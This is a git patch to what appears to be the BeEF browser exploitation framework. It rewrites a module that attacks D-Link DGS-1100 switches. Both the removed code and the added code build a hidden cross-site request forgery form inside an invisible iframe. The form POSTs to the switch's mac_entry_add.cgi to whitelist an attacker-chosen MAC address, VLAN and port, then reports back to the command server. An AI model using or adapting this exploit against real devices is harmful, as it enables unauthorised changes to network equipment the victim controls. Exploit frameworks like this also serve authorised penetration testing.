From 558646bd8590bc1482d6e84d360e1d1d8d2bb12b Mon Sep 17 00:00:00 2001 From: Nicholas Starke Date: Sat, 25 Feb 2017 08:03:45 -0600 Subject: [PATCH] Adjusting to use XsrfForm --- .../dlink_dgs_1100_fdb_whitelist/command.js | 33 +++---------------- 1 file changed, 5 insertions(+), 28 deletions(-) diff --git a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js index 9398c804f..3cfa1e022 100644 --- a/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js +++ b/modules/exploits/switch/dlink_dgs_1100_fdb_whitelist/command.js @@ -11,34 +11,11 @@ beef.execute(function() { var mac = '<%= @mac %>'; var vlanid = '<%= @vlanid %>'; - var dlink_dgs_iframe = beef.dom.createInvisibleIframe(); - - var form = document.createElement('form'); - form.setAttribute('action', base + "/cgi/mac_entry_add.cgi"); - form.setAttribute('method', 'POST'); - - var input = null; - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'fwdport'); - input.setAttribute('value', port); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'vid'); - input.setAttribute('value', vlanid); - form.appendChild(input); - - input = document.createElement('input'); - input.setAttribute('type', 'hidden'); - input.setAttribute('name', 'macaddr'); - input.setAttribute('value', mac); - form.appendChild(input); - - dlink_dgs_iframe.contentWindow.document.body.appendChild(form); - form.submit(); + var dlink_dgs_iframe = beef.dom.createIframeXsrfForm(base + '/cgi/mac_entry_add.cgi', 'POST', 'application/x-www-form-urlencoded', [ + { type: 'hidden', name: 'fwdport', value: port }, + { type: 'hidden', name: 'vid', value: vlanid }, + { type: 'hidden', name: 'macaddr', value: mac } + ]); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");